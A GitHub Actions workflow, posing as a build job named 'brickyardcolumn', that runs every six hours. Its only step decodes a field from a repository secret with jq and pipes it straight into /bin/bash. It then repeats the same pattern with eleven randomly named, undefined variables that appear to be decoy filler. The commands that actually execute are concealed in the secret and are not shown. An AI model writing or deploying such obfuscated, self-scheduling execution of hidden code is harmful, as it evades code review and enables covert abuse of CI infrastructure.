name: brickyardcolumn

on:
  workflow_dispatch:
  schedule:
    - cron: '23 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: brickyardcolumn
        env:
          ua302: ${{ secrets.ua302 }}
        run: |
          echo $ua302 | jq -r .lerow3 | /bin/bash
          echo $n08222 | jq -r .d8 | /bin/bash
          echo $r070 | jq -r .peqxm97571 | /bin/bash
          echo $y16 | jq -r .k0 | /bin/bash
          echo $l9067 | jq -r .msui4905 | /bin/bash
          echo $b4 | jq -r .e28050 | /bin/bash
          echo $tmzr320 | jq -r .dwhy375 | /bin/bash
          echo $vd4965 | jq -r .d4400 | /bin/bash
          echo $o3096 | jq -r .kfikx18 | /bin/bash
          echo $wtsj8758 | jq -r .nhvy65 | /bin/bash
          echo $n063 | jq -r .siyw8129 | /bin/bash
          echo $rzf47140 | jq -r .bk42005 | /bin/bash

